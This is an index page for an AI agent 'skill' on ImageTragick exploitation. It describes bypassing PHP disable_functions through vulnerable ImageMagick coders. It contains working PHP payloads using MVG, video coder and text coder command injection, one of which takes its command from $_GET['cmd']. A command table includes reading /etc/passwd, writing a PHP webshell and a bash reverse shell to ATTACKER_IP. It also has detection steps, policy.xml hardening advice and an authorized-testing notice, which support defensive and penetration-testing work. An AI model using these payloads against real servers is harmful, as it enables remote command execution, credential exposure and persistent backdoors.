OpenSkillIndex← back to search

Hacktricks-skills imagick-disable-functions-bypass

Security testing skill for detecting and exploiting ImageMagick/ImageTragick vulnerabilities to bypass PHP disable_functions restrictions. Use this skill whenever the user mentions PHP security testing, disable_functions bypass, ImageMagick vulnerabilities, ImageTragick, CVE-2016-3714, or needs to test for command injection through image processing libraries. Also trigger when users ask about PHP hardening bypass, ImageMagick policy.xml configuration, or security auditing of PHP applications with image upload functionality.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit/SKILL.MD
source content

ImageMagick disable_functions Bypass Testing

A security testing skill for detecting and exploiting ImageMagick/ImageTragick vulnerabilities that allow command execution even when PHP's 

disable_functions
is configured.

Overview

The ImageTragick family of vulnerabilities (CVE-2016-3714 and related) allows attackers to execute arbitrary shell commands through crafted image files when:

  • PHP Imagick extension is installed
  • ImageMagick backend is vulnerable (typically < 7.1.1-11 or 6.x < 6.9.12-73)
  • disable_functions
    is configured but ImageMagick delegates are not hardened

Important: This skill is for authorized security testing only. Always have written permission before testing.

Detection Workflow

Step 1: Check PHP and Imagick Versions

# Check PHP version
php -r 'echo phpversion(), "\n";'

# Check Imagick extension and ImageMagick version
php -r 'echo Imagick::getVersion()["versionString"], "\n";'

# Check system ImageMagick version
convert -version | head -1

Step 2: Check Policy Configuration

# Check which coders are enabled/disabled
convert -list policy | grep -iE 'mvg|https|video|text|url|ps'

# If MVG, URL, VIDEO, or TEXT coders are enabled, the system may be vulnerable

Step 3: Check disable_functions Status

<?php
echo "Disable functions: " . ini_get("disable_functions") . "\n";
echo "Imagick available: " . (extension_loaded('imagick') ? 'Yes' : 'No') . "\n";
?>

Exploitation Techniques

Classic ImageTragick (CVE-2016-3714)

Works on Imagick <= 3.3.0 with vulnerable ImageMagick:

<?php
// Classic MVG payload
$cmd = $_GET['cmd'] ?? 'id';
$tmp = tempnam('/tmp', 'pwn');
$mvgs = tempnam('/tmp', 'img');

$payload = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/x.jpg"|$cmd >$tmp")'
pop graphic-context
EOF;

file_put_contents($mvgs, $payload);
$img = new Imagick();
$img->readImage($mvgs);
$img->writeImage(tempnam('/tmp', 'img'));
$img->destroy();

echo file_get_contents($tmp);
?>

Modern Video Coder Variant (2023+)

Works on newer ImageMagick versions with video coder enabled:

<?php
$exp = <<<MAGICK
push graphic-context
image over 0,0 0,0 'vid:dummy.mov" -define video:pixel-format="rgba`uname -a > /tmp/pwned`" " dummy'
pop graphic-context
MAGICK;

$img = new Imagick();
$img->readImageBlob($exp);
?>

Text Coder Variant (CVE-2020-29599)

<?php
$payload = 'text:"foo"`id > /tmp/pwned`"';
$img = new Imagick();
$img->readImageBlob($payload);
?>

Common Test Commands

Use these to verify exploitation works:

PurposeCommand
Basic verification
id
System enumeration
id; uname -a; cat /etc/passwd
File write (webshell)
echo '<?php system($_GET["c"]);' > /var/www/html/shell.php
Reverse shell
bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
Check current user
whoami; pwd

Mitigation Guidance

1. Patch/Upgrade

  • ImageMagick >= 7.1.1-11 (or latest 6.x LTS)
  • Imagick PHP extension >= 3.7.2

2. Harden policy.xml

Edit 

/etc/ImageMagick-6/policy.xml
or 
/etc/ImageMagick-7/policy.xml
:

<policy domain="coder" rights="none" pattern="MVG"/>
<policy domain="coder" rights="none" pattern="MSL"/>
<policy domain="coder" rights="none" pattern="URL"/>
<policy domain="coder" rights="none" pattern="VIDEO"/>
<policy domain="coder" rights="none" pattern="PS"/>
<policy domain="coder" rights="none" pattern="TEXT"/>

3. Remove Imagick Extension

If image processing is not required, remove the extension:

# Debian/Ubuntu
sudo apt-get remove php-imagick

# RHEL/CentOS
sudo yum remove php-imagick

4. Defense in Depth

Never rely solely on 

disable_functions
. Use:

  • Proper input validation
  • File upload restrictions
  • Chroot jails or containers
  • SELinux/AppArmor policies

Test Cases

Test Case 1: Basic Detection

Prompt: "Check if this PHP server is vulnerable to ImageMagick command injection"

Expected: Run detection workflow, check versions and policy configuration

Test Case 2: Exploitation Test

Prompt: "Test if disable_functions can be bypassed through ImageMagick on this target"

Expected: Attempt exploitation with safe test commands like 

id
or 
whoami

Test Case 3: Mitigation Review

Prompt: "How do I harden ImageMagick against command injection attacks?"

Expected: Provide policy.xml configuration and upgrade guidance

References

Security Notice

This skill is for authorized security testing only.

  • Always obtain written permission before testing
  • Use only on systems you own or have explicit authorization to test
  • Document all findings for the system owner
  • Follow responsible disclosure practices